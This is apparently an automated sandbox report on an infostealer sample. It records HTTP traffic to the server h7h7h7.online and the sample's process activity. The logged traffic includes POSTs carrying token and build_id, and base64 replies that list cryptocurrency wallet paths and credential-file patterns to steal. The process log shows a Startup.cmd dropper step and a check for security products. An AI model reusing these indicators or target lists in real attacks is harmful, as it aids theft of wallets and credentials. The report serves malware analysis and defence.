                                                                                                                                                                                                                                                              2024-12-31 20:40:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:44 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              23192.168.2.449778116.203.13.1094437740C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:38 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----9z5fu3ohlnycjmycjw47
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Content-Length: 331
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-31 20:40:38 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 39 7a 35 66 75 33 6f 68 6c 6e 79 63 6a 6d 79 63 6a 77 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 39 7a 35 66 75 33 6f 68 6c 6e 79 63 6a 6d 79 63 6a 77 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 39 7a 35 66 75 33 6f 68 6c 6e 79 63 6a 6d 79 63 6a 77 34 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------9z5fu3ohlnycjmycjw47Content-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------9z5fu3ohlnycjmycjw47Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------9z5fu3ohlnycjmycjw47Cont
                                                                                                                                                                                                                                                              2024-12-31 20:40:39 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:39 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-31 20:40:39 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                              Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              24192.168.2.449779116.203.13.1094437740C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:40 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----dba168gln7qieuaaiwbi
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Content-Length: 331
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-31 20:40:40 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 61 31 36 38 67 6c 6e 37 71 69 65 75 61 61 69 77 62 69 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 64 62 61 31 36 38 67 6c 6e 37 71 69 65 75 61 61 69 77 62 69 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 64 62 61 31 36 38 67 6c 6e 37 71 69 65 75 61 61 69 77 62 69 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------dba168gln7qieuaaiwbiContent-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------dba168gln7qieuaaiwbiContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------dba168gln7qieuaaiwbiCont
                                                                                                                                                                                                                                                              2024-12-31 20:40:40 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:40 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-31 20:40:40 UTC1524INData Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                                              Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              25192.168.2.449781116.203.13.1094437740C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:41 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----6x4wtrim79h47qiw4wt0
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Content-Length: 453
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-31 20:40:41 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 36 78 34 77 74 72 69 6d 37 39 68 34 37 71 69 77 34 77 74 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 36 78 34 77 74 72 69 6d 37 39 68 34 37 71 69 77 34 77 74 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 36 78 34 77 74 72 69 6d 37 39 68 34 37 71 69 77 34 77 74 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------6x4wtrim79h47qiw4wt0Content-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------6x4wtrim79h47qiw4wt0Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------6x4wtrim79h47qiw4wt0Cont
                                                                                                                                                                                                                                                              2024-12-31 20:40:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:42 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-31 20:40:42 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              26192.168.2.449788116.203.13.1094437740C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:45 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----7y5pzmohvs0rimglnym7
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Content-Length: 331
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-31 20:40:45 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 37 79 35 70 7a 6d 6f 68 76 73 30 72 69 6d 67 6c 6e 79 6d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 37 79 35 70 7a 6d 6f 68 76 73 30 72 69 6d 67 6c 6e 79 6d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 37 79 35 70 7a 6d 6f 68 76 73 30 72 69 6d 67 6c 6e 79 6d 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------7y5pzmohvs0rimglnym7Content-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------7y5pzmohvs0rimglnym7Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------7y5pzmohvs0rimglnym7Cont
                                                                                                                                                                                                                                                              2024-12-31 20:40:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:46 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-31 20:40:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              27192.168.2.449799116.203.13.1094437740C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:46 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----us0zcbs26pzcjmoppph4
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Content-Length: 331
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-31 20:40:46 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 75 73 30 7a 63 62 73 32 36 70 7a 63 6a 6d 6f 70 70 70 68 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 75 73 30 7a 63 62 73 32 36 70 7a 63 6a 6d 6f 70 70 70 68 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 75 73 30 7a 63 62 73 32 36 70 7a 63 6a 6d 6f 70 70 70 68 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------us0zcbs26pzcjmoppph4Content-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------us0zcbs26pzcjmoppph4Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------us0zcbs26pzcjmoppph4Cont
                                                                                                                                                                                                                                                              2024-12-31 20:40:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:47 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-31 20:40:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                              Start time:15:39:44
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\CenteredDealing.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\CenteredDealing.exe"
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              File size:1'203'969 bytes
                                                                                                                                                                                                                                                              MD5 hash:228E734F246564BB255B68D51BD6D31E
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                                                              Start time:15:39:45
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c move Startup Startup.cmd & Startup.cmd
                                                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                                              Start time:15:39:45
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                                              Start time:15:39:47
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:tasklist
                                                                                                                                                                                                                                                              Imagebase:0x680000
                                                                                                                                                                                                                                                              File size:79'360 bytes
                                                                                                                                                                                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                                              Start time:15:39:47
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                              Imagebase:0x980000
                                                                                                                                                                                                                                                              File size:29'696 bytes
